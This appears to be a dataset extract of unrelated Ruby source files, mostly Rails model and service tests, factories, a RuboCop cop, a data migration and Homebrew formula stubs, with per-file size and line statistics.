hexsha stringlengths 40 40 | size int64 2 1.01M | content stringlengths 2 1.01M | avg_line_length float64 1.5 100 | max_line_length int64 2 1k | alphanum_fraction float64 0.25 1 |
---|---|---|---|---|---|
338a34387a487ff93f6b19042aca225401735c05 | 228 | class FakeFileIO < StringIO
attr_reader :original_filename
attr_reader :path
def initialize(filename, content)
super(content)
@original_filename = File.basename(filename)
@path = File.path(filename)
end
end
| 20.727273 | 48 | 0.741228 |
8762da7b26d2d268b481451a82080444424f8e69 | 874 | namespace :a1news do
desc "Collect News Sources"
task collect: :environment do
force = ENV["FORCE"]
as_of = ENV["HOURSAGO"] ? ENV["HOURSAGO"].to_i.hours.ago : Time.now
NewsSource.subclasses.each do |newsource|
begin
# Only get new stuff after 5am
puts "--- #{newsource.source} ---"
if force || Cover.where(:date => 5.hours.ago.to_date, :source => newsource.source).empty?
puts "Processing #{newsource.source} either because force is on or not found in DB"
newsource.new(as_of).tap do |source|
if source.is_available?
puts "#{newsource.source} feed found"
source.collect
else
puts "#{newsource.source} feed not found"
end
end
end
rescue StandardError => ex
# Log the failure and continue with the next source instead of aborting the task
puts "Error collecting #{newsource.source}: #{ex.message}"
end
end
end
end
| 29.133333 | 97 | 0.567506 |
338858dbea5bbba513541b70bf561ab18ad88f71 | 8,440 | require 'test_helper'
class PatientTest < ActiveSupport::TestCase
before do
@user = create :user
@patient = create :patient, other_phone: '111-222-3333',
other_contact: 'Yolo'
@patient2 = create :patient, other_phone: '333-222-3333',
other_contact: 'Foobar'
@pregnancy = create :pregnancy, patient: @patient
end
describe 'callbacks' do
before do
@new_patient = build :patient, name: ' Name With Whitespace ',
other_contact: ' name with whitespace ',
other_contact_relationship: ' something ',
primary_phone: '111-222-3333',
other_phone: '999-888-7777'
end
it 'should clean fields before save' do
@new_patient.save
assert_equal 'Name With Whitespace', @new_patient.name
assert_equal 'name with whitespace', @new_patient.other_contact
assert_equal 'something', @new_patient.other_contact_relationship
assert_equal '1112223333', @new_patient.primary_phone
assert_equal '9998887777', @new_patient.other_phone
end
end
describe 'validations' do
it 'should build' do
assert @patient.valid?
end
it 'requires a name' do
@patient.name = nil
refute @patient.valid?
end
it 'requires a primary phone' do
@patient.primary_phone = nil
refute @patient.valid?
end
it 'requires a logged creating user' do
@patient.created_by_id = nil
refute @patient.valid?
end
%w(primary_phone other_phone).each do |phone|
it "should enforce a max length of 10 for #{phone}" do
@patient[phone] = '123-456-789022'
refute @patient.valid?
end
it "should clean before validation for #{phone}" do
@patient[phone] = '111-222-3333'
@patient.save
assert_equal '1112223333', @patient[phone]
end
end
%w(initial_call_date name primary_phone created_by).each do |field|
it "should enforce presence of #{field}" do
@patient[field.to_sym] = nil
refute @patient.valid?
end
end
it 'should require appointment_date to be after initial_call_date' do
@patient.initial_call_date = '2016-06-01'
@patient.appointment_date = '2016-05-01'
refute @patient.valid?
@patient.appointment_date = nil
assert @patient.valid?
@patient.appointment_date = '2016-07-01'
assert @patient.valid?
end
end
describe 'pledge_summary' do
it "should not error when there are no pregnancies" do
Patient.destroy_all
assert_equal '{:pledged=>0, :sent=>0}', Patient.pledged_status_summary.to_s
end
it "should return proper pledge summaries for various timespans" do
[@patient, @patient2].each do |pt|
create :pregnancy, patient: pt, created_by: @user
end
@patient.update appointment_date: ( Date.today + 4 )
@patient.pregnancy.update dcaf_soft_pledge: 300
@patient2.update appointment_date: ( Date.today + 8 )
@patient2.pregnancy.update dcaf_soft_pledge: 500, pledge_sent: true
assert_equal '{:pledged=>0, :sent=>0}', Patient.pledged_status_summary(1).to_s
assert_equal '{:pledged=>300, :sent=>0}', Patient.pledged_status_summary.to_s
assert_equal '{:pledged=>300, :sent=>500}', Patient.pledged_status_summary(10).to_s
end
end
describe 'callbacks' do
%w(name other_contact).each do |field|
it "should strip whitespace from before and after #{field}" do
@patient[field] = ' Yolo Goat '
@patient.save
assert_equal 'Yolo Goat', @patient[field]
end
end
%w(primary_phone other_phone).each do |field|
it "should remove nondigits on save from #{field}" do
@patient[field] = '111-222-3333'
@patient.save
assert_equal '1112223333', @patient[field]
end
end
end
# describe 'relationships' do
# it 'should have many pregnancies' do
# end
# it 'should have at least one associated patient' do
# end
# it 'should have only one active patient' do
# end
# end
describe 'search method' do
before do
@pt_1 = create :patient, name: 'Susan Sher', primary_phone: '124-456-6789'
@pt_2 = create :patient, name: 'Susan E',
primary_phone: '124-567-7890',
other_contact: 'Friend Ship'
@pt_3 = create :patient, name: 'Susan A', other_phone: '999-999-9999'
[@pt_1, @pt_2, @pt_3].each do |pt|
create :pregnancy, patient: pt, created_by: @user
end
end
it 'should find a patient on name or other name' do
assert_equal 1, Patient.search('Susan Sher').count
assert_equal 1, Patient.search('Friend Ship').count
end
# it 'should find multiple patients if there are multiple' do
# assert_equal 2, Patient.search('124-456-6789').count
# end
it 'should be able to find based on secondary phones too' do
assert_equal 1, Patient.search('999-999-9999').count
end
it 'should be able to find based on phone patterns' do
assert_equal 2, Patient.search('124').count
end
it 'should not choke if it does not find anything' do
assert_equal 0, Patient.search('no entries with this').count
end
end
describe 'other methods' do
before do
@patient = create :patient, primary_phone: '111-222-3333',
other_phone: '111-222-4444'
end
it 'primary_phone_display -- should be hyphenated phone' do
refute_equal @patient.primary_phone, @patient.primary_phone_display
assert_equal '111-222-3333', @patient.primary_phone_display
end
it 'secondary_phone_display - should be hyphenated other phone' do
refute_equal @patient.other_phone, @patient.other_phone_display
assert_equal '111-222-4444', @patient.other_phone_display
end
end
describe 'mongoid attachments' do
it 'should have timestamps from Mongoid::Timestamps' do
[:created_at, :updated_at].each do |field|
assert @patient.respond_to? field
assert @patient[field]
end
end
it 'should respond to history methods' do
assert @patient.respond_to? :history_tracks
assert @patient.history_tracks.count > 0
end
it 'should have accessible userstamp methods' do
assert @patient.respond_to? :created_by
assert @patient.created_by
end
end
describe 'methods' do
describe 'identifier method' do
it 'should return a identifier' do
@patient.update primary_phone: '111-333-5555'
assert_equal 'D3-5555', @patient.identifier
end
end
describe 'most_recent_note_display_text method' do
before do
@note = create :note, patient: @patient,
full_text: (1..100).map(&:to_s).join('')
end
it 'returns 44 characters of the notes text' do
assert_equal 44, @patient.most_recent_note_display_text.length
assert_match(/^1234/, @patient.most_recent_note_display_text)
end
end
describe 'history check methods' do
it 'should say whether a patient is still urgent' do
# TODO: TIMECOP
@patient.urgent_flag = true
@patient.save
assert @patient.still_urgent?
end
it 'should trim pregnancies after they have been urgent for five days' do
# TODO: TEST patient#trim_urgent_pregnancies
end
end
describe 'still urgent method' do
it 'should return true if marked urgent in last 6 days' do
@patient.update urgent_flag: true
assert @patient.still_urgent?
end
it 'should return false if pledge sent' do
@patient.update urgent_flag: true
@pregnancy.update pledge_sent: true
assert_not @patient.still_urgent?
end
it 'should return false if resolved without dcaf' do
@patient.update urgent_flag: true
@pregnancy.update resolved_without_dcaf: true
assert_not @patient.still_urgent?
end
it 'should return false if not updated for more than 6 days' do
Timecop.freeze(Time.zone.now - 7.days) do
@patient.update urgent_flag: true
end
assert_not @patient.still_urgent?
end
end
end
end
| 31.969697 | 89 | 0.639455 |
798b86be002e0ad81d9fc71aa03f8073287d62d3 | 147 | class Tag < ApplicationRecord
has_many :taggings, dependent: :delete_all
has_many :articles, through: :taggings
def to_s
name
end
end
| 16.333333 | 44 | 0.734694 |
4a7d8ab4c6cacee6d8385b14fab951d35fa7e889 | 6,067 | require "spec_helper"
describe MergeRequests::GetUrlsService do
let(:project) { create(:project, :public, :repository) }
let(:service) { described_class.new(project) }
let(:source_branch) { "my_branch" }
let(:new_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/new?merge_request%5Bsource_branch%5D=#{source_branch}" }
let(:show_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/#{merge_request.iid}" }
let(:new_branch_changes) { "#{Gitlab::Git::BLANK_SHA} 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/#{source_branch}" }
let(:deleted_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 #{Gitlab::Git::BLANK_SHA} refs/heads/#{source_branch}" }
let(:existing_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/#{source_branch}" }
let(:default_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/master" }
describe "#execute" do
shared_examples 'new_merge_request_link' do
it 'returns url to create new merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: source_branch,
url: new_merge_request_url,
new_merge_request: true
}])
end
end
shared_examples 'show_merge_request_url' do
it 'returns url to view merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: source_branch,
url: show_merge_request_url,
new_merge_request: false
}])
end
end
shared_examples 'no_merge_request_url' do
it 'returns no URL' do
result = service.execute(changes)
expect(result).to be_empty
end
end
context 'pushing to default branch' do
let(:changes) { default_branch_changes }
it_behaves_like 'no_merge_request_url'
end
context 'pushing to project with MRs disabled' do
let(:changes) { new_branch_changes }
before do
project.project_feature.update_attribute(:merge_requests_access_level, ProjectFeature::DISABLED)
end
it_behaves_like 'no_merge_request_url'
end
context 'pushing one completely new branch' do
let(:changes) { new_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to existing branch but no merge request' do
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to deleted branch' do
let(:changes) { deleted_branch_changes }
it_behaves_like 'no_merge_request_url'
end
context 'pushing to existing branch and merge request opened' do
let!(:merge_request) { create(:merge_request, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch and merge request is reopened' do
let!(:merge_request) { create(:merge_request, :reopened, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch from forked project' do
let(:user) { create(:user) }
let!(:forked_project) { Projects::ForkService.new(project, user).execute }
let!(:merge_request) { create(:merge_request, source_project: forked_project, target_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
# Source project is now the forked one
let(:service) { described_class.new(forked_project) }
before do
allow(forked_project).to receive(:empty_repo?).and_return(false)
end
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch and merge request is closed' do
let!(:merge_request) { create(:merge_request, :closed, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to existing branch and merge request is merged' do
let!(:merge_request) { create(:merge_request, :merged, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing new branch and existing branch (with merge request created) at once' do
let!(:merge_request) { create(:merge_request, source_project: project, source_branch: "existing_branch") }
let(:new_branch_changes) { "#{Gitlab::Git::BLANK_SHA} 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/new_branch" }
let(:existing_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/existing_branch" }
let(:changes) { "#{new_branch_changes}\n#{existing_branch_changes}" }
let(:new_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/new?merge_request%5Bsource_branch%5D=new_branch" }
it 'returns 2 urls for both creating new and showing merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: "new_branch",
url: new_merge_request_url,
new_merge_request: true
}, {
branch_name: "existing_branch",
url: show_merge_request_url,
new_merge_request: false
}])
end
end
context 'when printing_merge_request_link_enabled is false' do
it 'returns empty array' do
project.update!(printing_merge_request_link_enabled: false)
result = service.execute(existing_branch_changes)
expect(result).to eq([])
end
end
end
end
| 41.841379 | 182 | 0.714192 |
6152f9a4ce7e4de9960b5828fa6d2cf3b160f82c | 5,450 | class CcaCarrierProfilesMigration < Mongoid::Migration
def self.up
if Settings.site.key.to_s == "cca"
site_key = "cca"
Dir.mkdir("hbx_report") unless File.exist?("hbx_report")
file_name = "#{Rails.root}/hbx_report/carrier_profile_migration_status_#{TimeKeeper.datetime_of_record.strftime("%m_%d_%Y_%H_%M_%S")}.csv"
field_names = %w( organization_id benefit_sponsor_organization_id status)
logger = Logger.new("#{Rails.root}/log/carrier_profile_migration_data.log") unless Rails.env.test?
logger.info "Script Start for carrier_profile_#{TimeKeeper.datetime_of_record}" unless Rails.env.test?
CSV.open(file_name, 'w') do |csv|
csv << field_names
#build and create Organization and its profiles
status = create_profile(site_key, csv, logger)
if status
puts "Rake Task execution completed, check carrier_profile_migration_data logs & carrier_profile_migration_status csv for additional information." unless Rails.env.test?
else
puts "Script execution failed" unless Rails.env.test?
end
end
logger.info "End of the script for carrier_profile" unless Rails.env.test?
else
say "Skipping for non-CCA site"
end
end
def self.down
raise "Can not be reversed!"
end
private
def self.create_profile(site_key, csv, logger)
#find or build site
sites = self.find_site(site_key)
return false unless sites.present?
site = sites.first
#get main app organizations for migration
old_organizations = Organization.unscoped.exists("carrier_profile" => true)
#counters
total_organizations = old_organizations.count
existing_organization = 0
success = 0
failed = 0
limit_count = 1000
say_with_time("Time taken to migrate organizations") do
old_organizations.batch_size(limit_count).no_timeout.all.each do |old_org|
begin
existing_new_organizations = find_new_organization(old_org)
if existing_new_organizations.count == 0
@old_profile = old_org.carrier_profile
json_data = @old_profile.to_json(:except => [:_id, :updated_by_id])
old_profile_params = JSON.parse(json_data)
@new_profile = self.initialize_new_profile(old_org, old_profile_params)
# @new_profile.issuer_hios_ids << @old_profile.issuer_hios_ids
new_organization = self.initialize_new_organization(old_org, site)
new_organization.save!
csv << [old_org.id, new_organization.id, "Migration Success"]
success = success + 1
else
existing_organization = existing_organization + 1
csv << [old_org.id, existing_new_organizations.first.id, "Already Migrated to new model, no action taken"]
end
rescue Exception => e
failed = failed + 1
csv << [old_org.id, "0", "Migration Failed"]
logger.error "Migration Failed for Organization HBX_ID: #{old_org.hbx_id} , #{e.inspect}" unless Rails.env.test?
end
end
end
logger.info " Total #{total_organizations} old organizations for type: carrier profile." unless Rails.env.test?
logger.info " #{failed} organizations failed to migrated to new DB at this point." unless Rails.env.test?
logger.info " #{success} organizations migrated to new DB at this point." unless Rails.env.test?
logger.info " #{existing_organization} old organizations are already present in new DB." unless Rails.env.test?
return true
end
def self.find_new_organization(old_org)
BenefitSponsors::Organizations::Organization.where(hbx_id: old_org.hbx_id)
end
def self.initialize_new_profile(old_org, old_profile_params)
new_profile = BenefitSponsors::Organizations::IssuerProfile.new(old_profile_params)
build_documents(old_org, new_profile)
build_office_locations(old_org, new_profile)
return new_profile
end
def self.build_documents(old_org, new_profile)
old_org.documents.each do |document|
doc = new_profile.documents.new(document.attributes.except("_id", "_type", "identifier"))
doc.identifier = document.identifier if document.identifier.present?
doc.save!
end
end
def self.build_office_locations(old_org, new_profile)
old_org.office_locations.each do |office_location|
new_office_location = new_profile.office_locations.new()
new_office_location.is_primary = office_location.is_primary
address_params = office_location.address.attributes.except("_id")
phone_params = office_location.phone.attributes.except("_id")
new_office_location.address = address_params
new_office_location.phone = phone_params
end
end
def self.initialize_new_organization(organization, site)
json_data = organization.to_json(:except => [:_id, :updated_by_id, :issuer_assigned_id, :versions, :version, :fein, :employer_profile, :broker_agency_profile, :general_agency_profile, :carrier_profile, :hbx_profile, :office_locations, :is_fake_fein, :home_page, :is_active, :updated_by, :documents])
old_org_params = JSON.parse(json_data)
exempt_organization = BenefitSponsors::Organizations::ExemptOrganization.new(old_org_params)
exempt_organization.site = site
exempt_organization.profiles << [@new_profile]
return exempt_organization
end
def self.find_site(site_key)
BenefitSponsors::Site.all.where(site_key: site_key.to_sym)
end
end
| 40.073529 | 303 | 0.723303 |
bbadacdbbdd0d07c2706b8ac0e3ecde0cff93d53 | 1,731 | require 'rails_helper'
describe MeasureComponent do
describe 'associations' do
describe 'duty expression' do
it_is_associated 'one to one to', :duty_expression do
let(:duty_expression_id) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'measurement unit' do
it_is_associated 'one to one to', :measurement_unit do
let(:measurement_unit_code) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'monetary unit' do
it_is_associated 'one to one to', :monetary_unit do
let(:monetary_unit_code) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'measurement unit qualifier' do
it_is_associated 'one to one to', :measurement_unit_qualifier do
let(:measurement_unit_qualifier_code) { Forgery(:basic).text(exactly: 1) }
end
end
end
describe '#zero_duty?' do
context 'when the measure component has a zero duty amount' do
subject(:measure_component) { create(:measure_component, duty_amount: 0) }
it { is_expected.to be_zero_duty }
end
context 'when the measure component has a non-zero duty amount' do
subject(:measure_component) { create(:measure_component, duty_amount: 15) }
it { is_expected.not_to be_zero_duty }
end
end
describe '#ad_valorem?' do
context 'when the measure component is an ad valorem component' do
subject(:measure_component) { create(:measure_component, :ad_valorem) }
it { is_expected.to be_ad_valorem }
end
context 'when the measure component is not an ad valorem component' do
subject(:measure_component) { build(:measure_component) }
it { is_expected.not_to be_ad_valorem }
end
end
end
| 29.844828 | 82 | 0.688042 |
6a7810f20e7adbbe7a218555fdd304e21ea37469 | 1,725 | # encoding: utf-8
module RuboCop
module Cop
module Style
# This cop checks for unwanted parentheses in parameterless method calls.
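# An illustrative example of the offense and its corrected form (inferred from
# the message and on_send logic below, not copied from the gem's docs):
#
# @example
#   # bad
#   object.some_method()
#
#   # good
#   object.some_method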
class MethodCallParentheses < Cop
MSG = 'Do not use parentheses for method calls with no arguments.'
ASGN_NODES = [:lvasgn, :masgn] + Util::SHORTHAND_ASGN_NODES
def on_send(node)
_receiver, method_name, *args = *node
# methods starting with a capital letter should be skipped
return if method_name =~ /\A[A-Z]/
return unless args.empty? && node.loc.begin
return if same_name_assignment?(node)
add_offense(node, :begin)
end
def autocorrect(node)
lambda do |corrector|
corrector.remove(node.loc.begin)
corrector.remove(node.loc.end)
end
end
private
def same_name_assignment?(node)
_receiver, method_name, *_args = *node
node.each_ancestor(ASGN_NODES).any? do |asgn_node|
if asgn_node.masgn_type?
mlhs_node, _mrhs_node = *asgn_node
asgn_node = mlhs_node.children[node.sibling_index]
end
# `obj.method = value` parses as (send ... :method= ...), and will
# not be returned as an `asgn_node` here
# however, `obj.method ||= value` parses as (or-asgn (send ...) ...)
# which IS an `asgn_node`
if asgn_node.or_asgn_type? || asgn_node.and_asgn_type?
asgn_node, _value = *asgn_node
return false if asgn_node.send_type?
end
asgn_node.loc.name.source == method_name.to_s
end
end
end
end
end
end
| 30.803571 | 80 | 0.583768 |
ab6f9a61521f271b46b34261e0395cf9ae9aaf2a | 1,929 | # frozen_string_literal: true
FactoryBot.define do
factory :network_alert_payload, class: Hash do
initialize_with do
{
flow: {
time: '2021-02-02T18:04:21.213587449Z',
verdict: 'POLICY_DENIED',
dropReasonDesc: 123,
ethernet: { source: '56:b6:52:62:6b:68', destination: '3a:dc:e3:9a:55:11' },
IP: { source: '10.0.0.224', destination: '10.0.0.87', ipVersion: 'IPv4' },
l4: { TCP: { sourcePort: 38_794, destinationPort: 5000, flags: { SYN: nil } } },
source: {
ID: 799,
identity: 37_570,
namespace: 'gitlab-managed-apps',
labels: [
'k8s:app.kubernetes.io/component=controller',
'k8s:app=nginx-ingress'
],
podName: 'ingress-nginx-ingress-controller-7dd4d7474d-m95gd'
},
destination: {
ID: 259,
identity: 30_147,
namespace: 'agent-project-21-production',
labels: [
'k8s:app=production',
'k8s:io.cilium.k8s.namespace.labels.app.gitlab.com/app=root-agent-project'
],
podName: 'production-7b998ffb56-vvl68'
},
Type: 'L3_L4',
nodeName: 'minikube',
eventType: { type: 5 },
trafficDirection: 'INGRESS',
Summary: 'TCP Flags: SYN'
},
ciliumNetworkPolicy: {
kind: 'bla',
apiVersion: 'bla',
metadata: {
name: 'Cilium Alert',
generateName: 'generated NAme',
namespace: 'LocalGitlab',
selfLink: 'www.gitlab.com',
uid: '2d931510-d99f-494a-8c67-87feb05e1594',
resourceVersion: '23',
deletionGracePeriodSeconds: 42,
clusterName: 'TestCluster'
},
status: {}
}
}.with_indifferent_access
end
end
end
| 32.694915 | 90 | 0.518922 |
ede991e2aacf7afb54ffa381135eaf162892a2f8 | 2,346 | # frozen_string_literal: true
require 'dry/validation'
Dry::Validation.load_extensions(:monads)
# Configuration values and shared rules and macros for domain model validation contracts
module AcaEntities
module Ledger
module Qbo
# Application Contract
class ApplicationContract < Dry::Validation::Contract
config.messages.default_locale = :en
# config.messages.backend = :i18n
# config.messages.default_locale - default I18n-compatible locale identifier
# config.messages.backend - the localization backend to use. Supported values are: :yaml and :i18n
# config.messages.load_paths - an array of files paths that are used to load messages
# config.messages.top_namespace - the key in the locale files under which messages are defined, by default it's dry_validation
# config.messages.namespace - custom messages namespace for a contract class. Use this to differentiate common messages
# TODO: Uncomment Rules below and add nested validations
# @!macro ruleeach
# Validates a nested array of $0 params
# @!method rule(settings)
# rule(:tags).each do
# if key? && value
# result = CallCenter::Validation::TagContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid tags", error: result.errors.to_h) if result && result.failure?
# end
# end
# rule(:phone_config) do
# if key? && value
# result = CallCenter::Validation::PhoneConfigContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid phone_config", error: result.errors.to_h) if result && result.failure?
# end
# end
# rule(:identity_info) do
# if key? && value
# result = CallCenter::Validation::IdentityInfoContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid identity_info", error: result.errors.to_h) if result && result.failure?
# end
# end
end
end
end
end
| 43.444444 | 134 | 0.662404 |
ac0cc7a9364950f20a12fe8b7d225593435b07a7 | 97 | # desc "Explaining what the task does"
# task :humanize_attributes do
# # Task goes here
# end
| 19.4 | 38 | 0.71134 |
acee7569011464b937d7229f189c8c52dc78c462 | 3,050 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
require 'capybara/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migration and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = false
config.before(:suite) do
DatabaseCleaner.strategy = :truncation
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.include Warden::Test::Helpers
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 40.666667 | 86 | 0.746557 |
f8e0c7c19ed11ed074089b8b3da4806aba6000b5 | 449 | require_relative 'test_helper'
module ActiveMetric
class SubjectTest < ActiveSupport::TestCase
test "can retrieve report specific fields" do
class SubjectWithFields < Subject
field :foo
calculated_with Sample, 5
end
expected_fields = {foo: "bar"}.stringify_keys
subject = SubjectWithFields.create foo: "bar"
assert_equal expected_fields, subject.not_inherited_attributes
end
end
end
| 19.521739 | 68 | 0.710468 |
d522b3b882d0dd4c06af0edb3bf4613e640922d9 | 905 | module LanguageServer
module Protocol
module Interface
#
# Execute command registration options.
#
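# A brief construction sketch; the command name below is a placeholder rather
# than a real server command:
#
#   options = ExecuteCommandRegistrationOptions.new(commands: ["myServer.doSomething"])
#   options.commands # => ["myServer.doSomething"]
#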
class ExecuteCommandRegistrationOptions
def initialize(work_done_progress: nil, commands:)
@attributes = {}
@attributes[:workDoneProgress] = work_done_progress if work_done_progress
@attributes[:commands] = commands
@attributes.freeze
end
# @return [boolean]
def work_done_progress
attributes.fetch(:workDoneProgress)
end
#
# The commands to be executed on the server
#
# @return [string[]]
def commands
attributes.fetch(:commands)
end
attr_reader :attributes
def to_hash
attributes
end
def to_json(*args)
to_hash.to_json(*args)
end
end
end
end
end
| 21.046512 | 83 | 0.577901 |
f7e0ce32c838b8d199e2958644ec415ef1f6b80c | 460 | require 'rails_helper'
# Specs in this file have access to a helper object that includes
# the GuessedLettersHelper. For example:
#
# describe GuessedLettersHelper do
# describe "string concat" do
# it "concats two strings with spaces" do
# expect(helper.concat_strings("this","that")).to eq("this that")
# end
# end
# end
RSpec.describe GuessedLettersHelper, :type => :helper do
pending "add some examples to (or delete) #{__FILE__}"
end
| 28.75 | 71 | 0.717391 |
79a04162174d2ed37809bdcee809b856dcedea28 | 2,190 | require 'spec_helper_min'
require 'carto/visualization_migrator'
describe Carto::VisualizationMigrator do
include Carto::Factories::Visualizations
include_context 'visualization creation helpers'
class VizMigrator
include Carto::VisualizationMigrator
end
let(:migrator) { VizMigrator.new }
shared_context 'full visualization' do
before(:all) do
@user_1 = FactoryGirl.create(:carto_user, private_tables_enabled: false)
@map, @table, @table_visualization, @visualization = create_full_visualization(Carto::User.find(@user_1.id), visualization_attributes: { version: 3 })
end
after(:all) do
destroy_full_visualization(@map, @table, @table_visualization, @visualization)
@user_1.destroy
end
end
describe '#migrate_visualization_to_v3' do
include_context 'full visualization'
it 'migrates layer selector for sequel model' do
@visualization.overlays << Carto::Overlay.new(type: 'layer_selector')
model = CartoDB::Visualization::Member.new(id: @visualization.id).fetch
migrator.migrate_visualization_to_v3(model)
model = CartoDB::Visualization::Member.new(id: @visualization.id).fetch
model.overlays.any? { |o| o.type == 'layer_selector' }.should be_false
model.map.options['layer_selector'].should be_true
end
it 'migrates layer selector for ActiveRecord model' do
@visualization.overlays << Carto::Overlay.new(type: 'layer_selector')
@visualization.reload
migrator.migrate_visualization_to_v3(@visualization)
@visualization.reload
@visualization.overlays.any? { |o| o.type == 'layer_selector' }.should be_false
@visualization.map.options['layer_selector'].should be_true
end
it 'fixes GMaps options' do
basemap = @visualization.layers.first
basemap.kind = 'gmapsbase'
basemap.options = { "type" => "GMapsBase", "base_type" => "roadmap" }
basemap.save!
migrator.migrate_visualization_to_v3(@visualization)
@visualization.reload
@visualization.layers.first.options.should have_key(:baseType)
@visualization.layers.first.options.should_not have_key(:base_type)
end
end
end
| 33.692308 | 156 | 0.723744 |
edbd93d2361ae544f8b2d377147b85a8b16866d3 | 2,132 | module Mutest
class Mutator
class Node
# Namespace for define mutations
class Define < self
private
# Emit mutations
#
# @return [undefined]
def dispatch
emit_arguments_mutations
emit_optarg_body_assignments
emit_restarg_body_mutation
emit_body(N_RAISE)
emit_body(N_ZSUPER)
emit_body(nil)
emit_body_mutations if body
end
# Emit mutations with optional arguments as assignments in method
#
# @return [undefined]
def emit_optarg_body_assignments
used_arguments.each do |argument|
next unless n_optarg?(argument)
emit_body_prepend(s(:lvasgn, *argument))
end
end
# Emit mutation with arg splat as empty array assignment in method
#
# @return [undefined]
def emit_restarg_body_mutation
used_arguments.each do |argument|
replacement =
if n_restarg?(argument)
s(:array)
elsif n_kwrestarg?(argument)
s(:hash)
end
next unless replacement && argument.children.one?
emit_body_prepend(s(:lvasgn, AST::Meta::Restarg.new(argument).name, replacement))
end
end
def used_arguments
arguments.children.select { |arg| AST::Meta::Optarg.new(arg).used? }
end
# Emit valid body ASTs depending on instance body
#
# @param node [Parser::AST::Node]
#
# @return [undefined]
def emit_body_prepend(node)
if body
emit_body(s(:begin, node, body))
else
emit_body(node)
end
end
# Mutator for instance method defines
class Instance < self
handle :def
children :name, :arguments, :body
end
# Mutator for singleton method defines
class Singleton < self
handle :defs
children :subject, :name, :arguments, :body
end
end
end
end
end
| 25.380952 | 93 | 0.554878 |
381b105d5f95df646e32de305159da6b1533798d | 292 | cask "geotagger" do
version "2.00"
sha256 "1c2dc9bceb21218d13961a0e9d77b91c2df38c596499f4eb805a428c285bedcc"
url "http://craig.stanton.net.nz/software/files/Geotagger#{version}.zip"
name "Geotagger"
homepage "http://craig.stanton.net.nz/code/geotagger/"
app "Geotagger.app"
end
| 26.545455 | 75 | 0.767123 |
61b5d614b3c05aebe5a3292c8ba682b28b67c164 | 2,514 | class Scrcpy < Formula
desc "Display and control your Android device"
homepage "https://github.com/Genymobile/scrcpy"
url "https://github.com/Genymobile/scrcpy/archive/v1.18.tar.gz"
sha256 "2995d74409e9a486e4f69d0f623299ebf615d9427d8e974dfd82355538a313e9"
license "Apache-2.0"
